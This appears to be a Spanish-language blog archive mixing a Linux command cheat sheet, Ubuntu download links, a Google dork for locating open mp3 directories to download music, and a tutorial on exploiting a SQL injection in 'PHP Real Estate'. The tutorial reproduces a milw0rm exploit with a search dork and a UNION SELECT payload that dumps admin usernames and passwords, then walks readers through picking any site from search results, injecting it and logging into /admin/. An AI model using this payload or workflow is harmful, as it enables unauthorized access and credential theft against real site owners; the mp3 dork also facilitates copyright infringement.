C:/>g00gle p2p

esto consiste realizar una busqueda de este tipo:

intitle:”index of” (mp3|mp4) adagio.for.strings. -html -htm -php -asp

Lo que hace esto es buscar los archivos deseados directamente en servidores, no en páginas web. Entre los resultados de esta búsqueda, hay que elegir alguna página que diga algo como “Index of/ (asdsad)”. En esa página se presentará una lista de archivos, entre esos hay que buscar el nombre de la banda o de la canción que se quiere bajar.
Hay que fijarse también que el tamaño del mp3 no sea demasiado bajo, para que esté completo y con calidad aceptable.
Buscando un poco no es difícil encontrar servidores con listas variadas de canciones, y con una tasa de transferencia bastante decente.

C:/>New bloG

haha bueno aqui empezando con el wordpress, me decidí a pasarme, aunque el dominio sera el mismo y de a poco voi agregando a el blogroll a todos ^^

si falta alguien me avisan

Salu2.

C:\>Comandos basicos linux

Aqui les dejo un resumen de una lista de comandos basicos para los q recien empiezan:

Comandos para el manejo de archivos:

cd =>>> cambia el directorio
compress =>>> comprime archivos en formato .Z
cp =>>> copia un archivo
chmod =>>> cambia los permisos de un archivo o directorio
chown =>>> cambia el propietario del archivo o directorio
df =>>> muestra el espacio libre en dicso
du =>>> muestra el espacio en disco utilizado
fdformat =>>> formatea un diskete
fdisk =>>> pariciona unidades
file =>>> determina el tipo de archivo a traves del analisis parcial de su contenido
find =>>> encuentra un archivo
fsck =>>> chequea el sistema de archivos
gzip =>>> descomprime un archivo en formato GZip
ln =>>> crea un enlace simbolico o fisico depende la opcion
ls =>>> sirve para listar el contenido de un directorio
mkdir =>>> crea un directorio
mkfs =>>> cra un nuevo sistema de archivos
mkswap =>>> crea un espacio de intercambio
more =>>> exhibe el contenido de un archivo
mount =>>> monta una unidad o particion en el sistema de archivos
mv =>>> mueve un archivo y se utiliza para renombrar
pwd =>>> devuelve la cadena correspondiente al directorio actual
rm =>>> borra un archivo
rmdir =>>> borra un directorio
swapon =>>> activa el espacio de intercambio
swapoff =>>> desactiva el espacio de intercambio
tar =>>>empaqueta o desempaqueta un archivo en formato .tar
type =>>> muestra la ubicacion de un archivo senialando su “path”
umount =>>> desmonta una unidad montada

Comandos para el manejo de procesos:

free =>>> muestra la memoria libre y utilizada
halt =>>> apaga la maquina
kill =>>> mata un proceso senialando el numero de este
ldd =>>> muestra las librerias necesarias para ejecutar un proceso
ps =>>> muestra todos los procesos q se estan ejecutando en el sistema
pstree =>>> lo mimo q ps pero en forma de arbol
reboot =>>> reinicia el sistema
shutdown =>>> cierra el sistema
top =>>> monitorea procesos y el estado del sistema
uname =>>> muestra informacion del sistema

Comandos para el manejo de usuarios:

adduser =>>> crea una cuenta de usuario
chsh =>>> cambia la shell de un usuario
groups =>>> muesra el listado de grupos de usuarios del sistema
id =>>> muestra la informacion de usuario y grupo de un determinado usuario
logout =>>> para salir del sistema y permitir el ingreso a otro usuario
passwd =>>> cambia el password de un determinado usuario
su =>>> le da privilegios de root a un usuario
talk =>>> permite chatear con otros usuarios
users =>>> lista los usuarios conectados al sistema
who =>>> muestra informacion de los usuarios conectados al sistema
whoami =>>> muestra informacion nuestra

Otros comandos:

cal =>>> muestra el calendario
date =>>> muestra el dia y la hora
info =>>> muestra la ayuda de un comando
man =>>> muestra las paginas del manual de un comando
startx =>>> para iniciar XWindow

Comandos Debian

apt-get update =>>> updatea la base de datos de los paquetes .deb
apt-get upgrade =>>> actualiza los paquetes a su ultima version
apt-get install “paquete” =>>> instala lo que escribiras en “paquete”
apt-get remove “paquete” =>>> desinstala lo que escribiras en “paquete”
apt-get check =>>> actualiza la cache de paquetes
apt-get clean =>>> borra los paquetes .deb descargados
apt-get dist-upgrade =>>> hace un upgrade del SO
apt-get source “paquete” =>>> descarga fuentes del “paquete”
apt-cache showpkg “paquete” =>>> muestra todas las versiones disponibles de “paquete”
modconf =>>> pequeño programa para sacar o poner modulos del kernel

Comandos de red

ping =>>> el tan famoso ping que manda paquetes esperando una respuesta
ifconfig =>>> para ver las placas de red
netstat =>>> testeo de red
host “destino” =>>> muestra ip de “destino”
nmap “ip de destino” =>>> pequeño programa para analizar ip´s o rangos de ellas

C:\>Ubuntu CD live

Buenas aqui dejo el link de donde pueden descargar Linux ubuntu:

http://releases.ubuntu.com/releases/

aqui tambien dejo un link de donde pueden pedir el live cd original de ubuntu y es GRATIS, pero tarde un tiempito hasta que te llegue masomenos 1 mes.

https://shipit.ubuntu.com/login

Salu2 gente.

C:\>Explotando ”PHP Real Estate SQL Injection Vulnerbilitys”

# Tutorial para explotar bug en php real estate. #

haha bueno, nuevo diseño, nuevo post primer post con este nuevo diseño diria, y hare como un “minitutorial” de como explotar php real estate.
acontinuacion paso a explicar, como aplicar sql inyeccion en php real estate.

1) conocer el xploit que usaremos, que es el siguiente:

–==+================================================================================+==–
–==+ PHP Real Estate SQL Injection Vulnerbilitys +==–
–==+================================================================================+==–

AUTHOR: t0pP8uZz & xprog
SITE: http://phprealestatescript.com
DORK: “Browse with Interactive Map”

DESCRIPTION:
pull admin info from database

EXPLOITS:
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

NOTE/TIP:
admin login is at /admin/

GREETZ: milw0rm.com, h4ck-y0u.org !

–==+================================================================================+==–
–==+ PHP Real Estate SQL Injection Vulnerbilitys +==–
–==+================================================================================+==–

# milw0rm.com [2007-12-14]

##############################################################

Empesemos paso a paso detalladamente a analizar el xploit:

a- como vemos, anteriormente, tenemos el dork que nos dara las webs vulnerables al xploit.

b- aki tenemos la descripcion del xploit.

c- aki tenemos la inyeccion sql, que aplicaremos a la web.

d- aki tenemos una nota, que nos dice que el pass que nos de el resultado de la inyeccion sera aplicado en /admin/

############################################################

############################################################

Anteriormente estan los pasos detalladamente explicados uno por uno.

# Acontinuación, veremos el procedimiendo para aplicar el xploit.

1) Iremos a www[dot]google[dot]com, y colocaremos el dork de xploit, en el campo de busqueda.

2) como veran les saldran varias webs, escojeremos 1, de ellas.

3) luego aplicaremos la inyeccion sql en la web

Ejemplo:

elegimos esta web -> www.asdasd.com

# con la inyeccion sql tendria que quedar algo asi:

# www.asdasd.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

4) Ahora si la web es vulnerable nos tendria que salir el pass y el user algo asi: xxx:xxx, es decir user:pass.

5) para logear como nos indica antes el xploit, iremos a /admin/ e intruduciremos el user y el pass.

Bueno creo que aqui termina el minituto, que es cortito y sencillo pero creo que entedible, cualqier duda qe tengan me comentan y les explico sin ningun problema.

Salu2.

C:\>First post

new blog in wordpress haha,

si falta alguien en los linkz que me avise y lo agrego ^^

Salu2.

Hello world!

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!